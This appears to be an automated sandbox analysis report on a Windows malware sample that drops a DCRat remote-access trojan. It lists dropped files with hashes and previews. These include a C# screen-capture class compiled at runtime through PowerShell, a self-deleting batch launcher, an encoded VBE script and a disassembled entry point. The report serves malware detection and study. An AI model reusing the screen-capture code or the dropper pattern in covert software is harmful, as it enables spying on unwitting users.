                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):607
                                                  Entropy (8bit):5.366029223594071
                                                  Encrypted:false
                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5wkn2d:p37Lvkmb6KOkqe1xBkrk+ikOfGWZEifb
                                                  MD5:2279AE0DF57B03AA28CA78FE0E49DBF1
                                                  SHA1:A1C62D0E65520980756014A6EFE5073CC60E7D67
                                                  SHA-256:9158DD1B9D3142A5B9DA5FC2F418E263489E0023CD4F3E16ECD47D931F742527
                                                  SHA-512:5D95EF913BCD827EF9EA700E601243BDD521863C808114739F5A42C4093E4D2D25C2309F794519DEDF749DBD15C0258800D29F73AF17527EEA843EE1B7AE1C21
                                                  Malicious:true
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.0.cs"
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4096
                                                  Entropy (8bit):3.1654032219595765
                                                  Encrypted:false
                                                  SSDEEP:48:6R7oEAtf0KhzBU/Nf6mtJ2N03pW1ulVa35q:LNz0Um+OXnK
                                                  MD5:CA5E932DAB059FCE36546A412B6AF7F4
                                                  SHA1:B5EFD2B5E892BF0FCF1F98E974019A016C3CB328
                                                  SHA-256:28715BA861C5E93ED11AAA23FE3901BA39782ADA5333188969308E0B35CB234B
                                                  SHA-512:67950FAC546B8E342DC94FBD95E07F431EBFBED9D1FB9959C13A284D3DE9DAB9AE0275686DFFE35DA104D7D1964F26591EDD573A43BC4A8A0F7C27AACF2BAAF2
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.tf...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):1149
                                                  Entropy (8bit):5.500555523456366
                                                  Encrypted:false
                                                  SSDEEP:24:KJfNpuId3ka6KOkqeFkOfXEifaKax5DqBVKVrdFAMBJTH:uNMkka6NkqeFkyXEuaK2DcVKdBJj
                                                  MD5:487C0AF0B270970EFFB2CFCB83C2D75B
                                                  SHA1:0908581B4D5C3D1E0CF26C92FBCB146E4A819D26
                                                  SHA-256:DCCCE2CBCA43689F26B09B045077EF4E805F913ABB869AAB3FA0B6394AAF8679
                                                  SHA-512:C7580B27970396760BE25984E03D82C84A78FCDECD0DFC73CE0A71C7C954D9C51BDFA12B3FFFB4B8713FEC3888D21D9AF4A4C3EA1FFF02204C0FD70453DF985C
                                                  Malicious:false
                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):204
                                                  Entropy (8bit):5.035681972482254
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9mVoJqyWRkbBktKcKZG1t+kiE2J5xAI6:hITg3Nou11r+DEiYUKOZG1wkn23flVkh
                                                  MD5:25D4F159BA7F75832D8EFF1307DFE239
                                                  SHA1:2B986D26533B590AE6DC6EC2BCFADC62DC67FB72
                                                  SHA-256:6C2B2B965D07B787A1B7D320A7C6A150A8EA35BB884C4E70CBBFC6D210DAB8DD
                                                  SHA-512:3959CD57BB9AF732FE0BE32BDECEE3E4C6E557298751BB7DE5F63A2424C5D7B180C1C3AC927AA093636F08BB9FBB7193178EF0B348B5D2C4948B45E1711D9BD5
                                                  Malicious:false
                                                  Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ShellComponents\tasklist.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sdnzbYHJb4.bat"
                                                  Process:C:\Users\user\AppData\Local\Temp\x11.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11992576
                                                  Entropy (8bit):7.999939221942735
                                                  Encrypted:true
                                                  SSDEEP:196608:N0J9PCV0pdS3DozJzZwlNKvXezMzsCfjUQK/CUHSdg41q9M1g7XMRbRSBfE3va:2J9PEEyzKveI5fbKBHMFzm7XAbEBfx
                                                  MD5:B93FC536DF3C66E783FCBB9071DB7545
                                                  SHA1:CE29BC506242C2389366F67EDB3B36577D01F778
                                                  SHA-256:9267614F67E94FEEEAE12C00F294E8AF4587CF74CE817D179098D7E17EF24874
                                                  SHA-512:4B4A87624EB5F23A13AC55ACC874E9444C41B54A772E3D89A5A383A476D09DB6DCDAC69BC914645FE8C3102EA050A4DBEDE65F379C4F51AA1FDEB01E8194B1E6
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.................................... ....@......................................................................... ..P................................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc.............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x12.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):12000768
                                                  Entropy (8bit):7.999934840895233
                                                  Encrypted:true
                                                  SSDEEP:196608:gcoxkLeUoO9/jmTUkXBnG9u21tvj0brnXiT8QPLaUQrsl2az0Desq3UOF2iQsmR3:rjLQO/64kBUu2vvjU2Tr+UfIaz0DgV2P
                                                  MD5:34CB7FCA8CB671327865D0BCF6DE72BC
                                                  SHA1:F0B1CEDACE31B386C893530E6DCE75C2ECFEF083
                                                  SHA-256:A6A27D9BA682A107558CDB16FCD50EBBE3D112C8DAB38E96D5926C522781CC81
                                                  SHA-512:A09A2FD355E0E7F7A7BF0C25FEE3300D7E695F1871514181AEF6CB7C5D9F085F6A3003CFEA423AD3C79D1B463B2DD3E323C84AE6D8E352483270EE20E520D373
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q..................................... ....@.......................................................................... ..P.................................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\QIjBj1l8We.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):12007936
                                                  Entropy (8bit):7.999943172026908
                                                  Encrypted:true
                                                  SSDEEP:196608:8plX8I/cr+ycpynZM1vx2s2tq5tbAW1GD58IRuj+lnG/eK8J8NrMbUxZT9jKjUNK:8oI/cr+FgnZ0xLbAW1TjAG/38++gxHUr
                                                  MD5:A236344BCC36451B5760C4BF40DF3CDA
                                                  SHA1:201737C41D87013535C5407F264F5D8E38F3351A
                                                  SHA-256:E5E02B828D06986C27C50CF3398EE4E9FC56FCDD017684AB27388EBD1F4FD265
                                                  SHA-512:EE1B7DAF72FD2A38E1C7F2CE8557CE164A1818485EFD49506BBBDCCCE33EAB702008AABB5721A13B9A14282BE92A8A0B29CECCC157AEBB591AFA10D5EE7CCFD6
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.....................(............... ....@..........................0............................................... ..P.......X............................................................................ ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...X...........................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x5.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11947008
                                                  Entropy (8bit):7.999880899586135
                                                  Encrypted:true
                                                  SSDEEP:196608:A/PxCnVXz24T43twVgT8qu2qB78ZJoDZXttgxj+7DKlBDrmLjPbmH2W9S6L6388v:qSVXlgTapB78ZaZXz3qDEWPzWvd+a
                                                  MD5:609A00E116060457295CE9293E6E3B3E
                                                  SHA1:E99114D54D914B0D543E62FF54807D83551A16B6
                                                  SHA-256:5CAC320A19828D4E3E89428AD877951BABAA6739A337FF4C8C2F3B9828D85358
                                                  SHA-512:1C1F117E06CA09DAB65626BCA4CAB8CCF4B3073DCA564A6CC2DC9E82A752F936150FF75E077DB0C906D1248F9CA9BB94D1AF8FED616D8E013C548B25033F8FCC
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.....................:............... ....@..........................@............................................... ..P.................................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11955200
                                                  Entropy (8bit):7.999878211469323
                                                  Encrypted:true
                                                  SSDEEP:196608:yOqLCiYuaGGagemuoPKopkidBTq5TIX77B7MN8xZalYFA9weGRYeDfWXUR5:yOqdaGFgQ/FcBscl7IAZFFA9qRYeDq+5
                                                  MD5:8DBEE0CB9B7550432DF6BEB4D9EA5CF0
                                                  SHA1:592502D95F326D76387D85FB48036179A7D15D38
                                                  SHA-256:D7FFD20027F5B1B9948E76FA157023C22A86425E026A377684A3947ABDB61135
                                                  SHA-512:20422414B413C33B1DB119488A71322B449DB756ECEE73C3825FEE991FD468A0E09C6AE4B60FE2FD568B0590B77DF43937EF8E35D752FF931482519D9FB0C183
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.....................Z............... ....@..........................`............................................... ..P........M........................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....M.......N..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x7.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11961856
                                                  Entropy (8bit):7.999911640103391
                                                  Encrypted:true
                                                  SSDEEP:196608:86kzCVCuxvPm0wFeQiM342skccPtERX15g94uMkzPpyZaIKpyYcMNhHV7nA0qlru:L5CuxvOQgfskccCRlFuMk1yIIpL437A0
                                                  MD5:61F5D17C10DE6541139134FB7058F88E
                                                  SHA1:A6DF4A45AAB40753023F2FDD7EFD32AE9A226FF5
                                                  SHA-256:914287AD713DF86EA9FED9F86CD963F88EB22DE143D8892B7EF055FD45DBA567
                                                  SHA-512:28B66E1CB8334E806139C8B30EC3100010ABF277D9D2E5EECF99AC837FB384CA5BF76DE2549BF4FAF92614CFAA6A861ABBE75055248242D9DC392C319375A900
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.....................t............... ....@.......................................................................... ..P........f........................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....f.......h..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x8.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11970048
                                                  Entropy (8bit):7.99991923016417
                                                  Encrypted:true
                                                  SSDEEP:196608:W/q1EvoJ/CuntkefzRZWvIXFWNy8LvIXMhVdw4YpWD0xYY7UarqWyIYjF2kTgDlb:C6Evy/VtkeNZWQXQcJQZYI07r2IYjjgF
                                                  MD5:0E9FEE8861C55C0EBADC5F678FBD8A9A
                                                  SHA1:C760E5D24B60902F566529AF6DDAF2B90E319046
                                                  SHA-256:866D6644CCCE8D86D9526EF959EE5DDD9414E35750A1A10968035063FFA694D8
                                                  SHA-512:F3461F6E0C0004A0B56578EFD83D7FD3F79EC47AD8E0848AE14D21BB585ECBFEC9770296382F63054395E636BA911B9E4BCC3F88C0EB9B73E542AD1F5D0B869E
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q..................................... ....@.......................................................................... ..P.................................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x9.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11977216
                                                  Entropy (8bit):7.999915092992493
                                                  Encrypted:true
                                                  SSDEEP:196608:WAddhK9aYTXJQYrP2C/3DBX+PMruZ8amDQ/yYLCI/3nzI/jgpymfJZHKEWy8:WAddoO4PBBOPK3aOQ/7e29ymfJZHKA8
                                                  MD5:DD97AAB085B140B715DD1A52038E3C70
                                                  SHA1:21A8CBFFA7C31A3AE0493B8567B528FABA5C4FE9
                                                  SHA-256:42BE65AD4DF6BF83CE6A30C1A159921463571C32FAF372AF53A5EDAB641EA7AA
                                                  SHA-512:7AD65E44D706E304C493895EEC33A538937DE13A13B0AF7B13BE95BE0615177D78E1EB3B8CBD06E5612DC7BCF522D2C9ABD5C6AB4EFACF20052BDF7E09BC4BA2
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q..................................... ....@.......................................................................... ..P.......X............................................................................ ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...X...........................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x10.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11985408
                                                  Entropy (8bit):7.999933254644437
                                                  Encrypted:true
                                                  SSDEEP:196608:RV604HzLIbh0dwgGG/dCoeDrFj9NyL+CYqOsS1wYEkICqksEy7ptOKdvQH1HXkLZ:RVwLIWC2Jetxw+Ck1zUCPsFtDKH1349/
                                                  MD5:7E5F18A5C7EB009E54AE4FC6127E864C
                                                  SHA1:E9217D8F28DE469A091CE420C5F74ABD5E77AE92
                                                  SHA-256:60F981607FDD0547FA8AFB700FBFC0CC8FCAC163BC819E36BBD859CE5594B016
                                                  SHA-512:2A4EF3C3C13A59CA681E189B662952583F5D124BD7CB5F8690AA30C44871FDA2DB9839B55BC26E0E53AF7F0447E910D405A3693AACBD214E13A62B13F11061ED
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.................................... ....@......................................................................... ..P................................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc.............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (741), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):741
                                                  Entropy (8bit):5.915525199650884
                                                  Encrypted:false
                                                  SSDEEP:12:bplKlcXL/MXSG8tSSMqhc96C5B3qJ2UFm3tp6fNaUYFSE2cKid97ke6COunYj94t:NhXL4SGGRNcdB3qJ2UFmMRYFSE2Hi773
                                                  MD5:332B9ECC4082DC9EC67E4E4A02BD9EAF
                                                  SHA1:48E4C202516499510C5813546CE9C6902B3FEEE2
                                                  SHA-256:7349CA6763BC94951E334242CD1D1A562808246DB39A3A34B268C9D0B71E4702
                                                  SHA-512:40286DABEBC3E5B1592382051575683C4E9AACA89E875A4BBD40478988DD63229449A5AFA13CE93750472DB97AE0A1E568DF1C621996805CA23A88B32A1527CF
                                                  Malicious:false
                                                  Preview:5G6ZbWXXYlCkXmeVCTU9mMP9WsTlZ4XVup0LT16qBpyUUz8pwJzjruHt17DsDw7dOqzrwSBLXo76X4phtoyQEynAhGUWyNmPsUGnAQ3eIoLDxLV6Sf8Z7qZZCyJp8pWJBrNDxBgdvUIamkMWvXDSPNRB5qkLGNfcRCBF7SIQ9foni8xbmx4klE4yZMHHaVWhypJkjGYcPwTtinc73JjTT50MIMpvKB0nJGz3zM2fYbVzvKQwtKNRvCN2y6cXbnSN6pkbyjHqRE42kBb763B9xi2G36E2ueEvIH2Fjy7JDgArIVSxfebhlSZYxei2fP6wAJtcIVXH626RhK7hoQXPDgKzreSFQFnxkOr9mzoJGUktWI0mgBNP1qtd83voCS11OIqTc85ymNJt6bdjnpiO1Y64fOAsE9HxcteNbgJhGZmnh9ghaLBWum9zMwyO8NtmGVQM6PHGgAIcvSXfrcR28uD0tpBps5j2pAhLtTlKE40udhD4ZTgg51nVSadQObYkaPwvuLvY0GxE3TWLmHQZZD7yWL3S0V6nfQTOvRJOhIpzDjc8ERoHL9KXS8YjRdhfKKin9IaU8B1QXIuwt4OiqzbgF55w2j6EkJo2By860UJJH39KNl0WO8zUtBiEMobYFxqOd2v46SrWpSZL6viQtkzmUTJ9Q4tM2uETNvrV05a6QcpamWIbFKoe8D3JswoBied5NF7KEMayJ3V1osW3wSHsGjVK2hnERYXv9
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):37
                                                  Entropy (8bit):3.9465059074343403
                                                  Encrypted:false
                                                  SSDEEP:3:I5RlQRJALAEn:I5EOJn
                                                  MD5:590BAFAC5EC119E118EB63489987073C
                                                  SHA1:43B1193A321EA8EB187D478B824B29688E2E40D4
                                                  SHA-256:6D73104DD95EB27A2AD2B311CAB5FCD401F2AAC68CB050EFF23E2CBF752A40AC
                                                  SHA-512:B81EDCCF58145F977C683F808FC88D599C25FAD5647E958D9DA8FC6F016C0D75EADDB44064C46EA487144873AB6648A8A70C074DC9EC4FE8F37711717CEF5685
                                                  Malicious:true
                                                  Preview:"C:\agentInto\fontsessionruntime.exe"
                                                  Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):204
                                                  Entropy (8bit):5.713360240009253
                                                  Encrypted:false
                                                  SSDEEP:6:GVWvwqK+NkLzWbHa/JUrFnBaORbM5nCFHRMEK/bgABu:GVW2MCzWLauhBaORbQC9ko
                                                  MD5:1E49F9332D5B41DDCAF97F7C284C16F8
                                                  SHA1:AA9F15475F700366B4B22728DCE302B58401850B
                                                  SHA-256:D569B2B96FE889CCCA95D5296D45A5B05E501BDEFBE6216D30A53267A0BCF55A
                                                  SHA-512:1487AAD116EE07A2ABBBA90F1290657420057C98E5F7A8A8F308F497EA5176FF7BA77252CE709C84318947834637C171BB69E6DBEA9E4D9F3D8E19CA260B652B
                                                  Malicious:false
                                                  Preview:#@~^swAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zCT+.Yq.YK&w",3wM11[mKs.{?FWR(COJBPZ~~0Csk+FzgAAA==^#~@.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):1218
                                                  Entropy (8bit):2.395432437980324
                                                  Encrypted:false
                                                  SSDEEP:12:9X6/bTqPEFfsbmJ/YP7LWPrNK6S48l2KZt/YNT:AHq6saJQXQK6zkpQ
                                                  MD5:329B41D15BE32D78E77D5B9BF79DB8E6
                                                  SHA1:932A7DB6CD0C764EA530986FB4E9CE4A00822FE1
                                                  SHA-256:815C18198E6E3B8C8BF732337E65CFBDFF75EF00007B4B4F95476D2E0E57D87F
                                                  SHA-512:CD3BFCC128658BADC6FB28F2DC7F4ECCCA461950CCCEAD0FC55210DFE94D6EC8AED76593E359F8ACF941EAD6FA577FE70CFD4BC65CE69CB23E31FA09D568500B
                                                  Malicious:false
                                                  Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.999943210821591
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  File name:QIjBj1l8We.exe
                                                  File size:12'016'128 bytes
                                                  MD5:48a8ee49651a74a74baca1f7c94729e5
                                                  SHA1:0339e2c61f6cdb9e37ca03f9d97e7811593eba23
                                                  SHA256:9ce7950dbd49b8c82b25df40fa94e88830361b8625d2f91214fa7583a346f992
                                                  SHA512:6bd551233c93c3fbe66b8eec7f5ae2f8d8b42b0918ff13384823c3ebb4d5993a6af3f2ec4280880d396414a9a770ee0dc909b78ae4a98579f32ba2a2855f1448
                                                  SSDEEP:196608:tHHbgJSiavNLVOOHrVB71ZwMFOc3aVeYz4t/+KwgPuZ9RaD:h7gJA3tHMC3a5z4XwgPo9y
                                                  TLSH:89C6333ABCD196FFEFBB35F94C4157A495D6CE14A42A31DD12D90FBC99B1B21A002832
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q.....................H............... ....@..........................P.............................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x401ae1
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:
                                                  Time Stamp:0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:d5d9d937853db8b666bd4b525813d7bd
                                                  Instruction
                                                  call 00007F84DCDDB6E1h
                                                  mov dword ptr [0040300Bh], eax
                                                  push 00000000h
                                                  call 00007F84DCDDB6EDh
                                                  mov dword ptr [00403013h], eax
                                                  call 00007F84DCDDB6EFh
                                                  mov dword ptr [00403C70h], eax
                                                  push 0000000Ah
                                                  push dword ptr [0040300Bh]
                                                  push 00000000h
                                                  push dword ptr [00403013h]
                                                  call 00007F84DCDDAB6Fh
                                                  push 00000000h
                                                  call 00007F84DCDDB698h
                                                  int3
                                                  jmp dword ptr [0040207Ch]
                                                  jmp dword ptr [00402008h]
                                                  jmp dword ptr [0040200Ch]
                                                  jmp dword ptr [00402010h]
                                                  jmp dword ptr [00402014h]
                                                  jmp dword ptr [00402018h]
                                                  jmp dword ptr [0040201Ch]
                                                  jmp dword ptr [00402020h]
                                                  jmp dword ptr [00402024h]
                                                  jmp dword ptr [00402028h]
                                                  jmp dword ptr [0040202Ch]
                                                  jmp dword ptr [00402030h]
                                                  jmp dword ptr [00402034h]
                                                  jmp dword ptr [00402038h]
                                                  jmp dword ptr [0040203Ch]
                                                  jmp dword ptr [00402040h]
                                                  jmp dword ptr [00402044h]
                                                  jmp dword ptr [00402048h]
                                                  jmp dword ptr [0040204Ch]
                                                  jmp dword ptr [00402050h]
                                                  jmp dword ptr [00402054h]
                                                  jmp dword ptr [00402058h]
                                                  jmp dword ptr [00402000h]
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
